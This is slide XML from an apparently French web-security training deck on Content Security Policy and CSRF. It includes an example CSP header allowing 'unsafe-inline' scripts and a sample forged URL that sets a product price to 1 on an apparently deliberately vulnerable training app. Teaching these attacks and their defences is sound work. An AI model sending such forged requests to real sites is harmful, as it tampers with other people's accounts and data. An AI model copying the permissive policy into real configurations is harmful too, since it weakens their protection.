          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Header HTTP interprété par le navigateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Whitelist de sources fiables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="304" name="Shape 304"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="60175" y="3526348"/>
            <a:ext cx="9144002" cy="1893903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Shape 305"/>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Content Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Shape 31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Directives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Shape 312"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1341975"/>
            <a:ext cx="8837699" cy="4792799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Content-Security-Policy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>  default-src 	‘none’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>  script-src	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'self' 'unsafe-inline'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*.newrelic.com https://*.criteo.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.google-analytics.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>  style-src		‘self’ ‘unsafe-inline’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>  frame-src	youtube.fr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>  					https://www.dailymotion.fr:443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>  img-src		‘self’ ‘data:’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>  report-uri	/api/csp-report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Shape 31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28</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Content Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Shape 319"/>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Reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Shape 320"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240925" y="1341975"/>
            <a:ext cx="8782500" cy="1120800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>report-uri : l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e navigateur envoie une requête POST à l’url définie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="321" name="Shape 321"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="127000" y="4124025"/>
            <a:ext cx="7886699" cy="2468660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="322" name="Shape 322"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2652708"/>
            <a:ext cx="9143998" cy="1414731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="f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27000" y="105303"/>
            <a:ext cx="8339700" cy="436500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Pourquoi parler de sécurité ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Shape 83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809750" y="1876425"/>
            <a:ext cx="5524500" cy="3105150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 8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a:t>
            </a:fld>
            <a:endParaRPr lang="f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Content Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Shape 329"/>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Can I use ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="330" name="Shape 330"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2244500"/>
            <a:ext cx="9144000" cy="2571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Shape 331"/>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="f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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2733675"/>
            <a:ext cx="7772400" cy="1470000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="6000"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Shape 33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31</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Shape 342"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1457775" y="1689325"/>
            <a:ext cx="7466125" cy="3613675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Shape 343"/>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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Shape 344"/>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Définition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240925" y="1359950"/>
            <a:ext cx="8618099" cy="1014600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600"/>
              <a:t>La victime exécute une action malgré elle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292600" y="5163225"/>
            <a:ext cx="8618099" cy="1353600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://securite-app-gruyere.herokuapp.com/compte/modifier/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>produits?prdId=104&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>prix=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Shape 34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32</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>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2547800" y="2878025"/>
            <a:ext cx="6596199" cy="3283625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Shape 353"/>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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Shape 354"/>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Prévention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Shape 355"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127000" y="1398450"/>
            <a:ext cx="5853900" cy="2521800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600"/>
              <a:t>Utilisation de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600" b="1"/>
              <a:t>token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600"/>
              <a:t>Unique, aléatoire, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>non prédictible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Durée de vie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600"/>
              <a:t>Génération à l’authenficiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connu côté serveur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="356" name="Shape 356"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3236525" y="1470587"/>
            <a:ext cx="552450" cy="542925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Shape 35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33</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 363"/>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Prévention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180750" y="1685200"/>
            <a:ext cx="3766499" cy="2800499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="3000"/>
              <a:t>Captcha</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="3000"/>
              <a:t>Re-authentification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="365" name="Shape 365"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="46409"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4045100" y="1913800"/>
            <a:ext cx="2814117" cy="997712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="366" name="Shape 366"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="76164"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="1761400"/>
            <a:ext cx="1251575" cy="997700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="367" name="Shape 367"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="43844" t="16756" r="3634" b="53845"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3833082" y="3737200"/>
            <a:ext cx="5144667" cy="1239724"/>
          </a:xfrm>
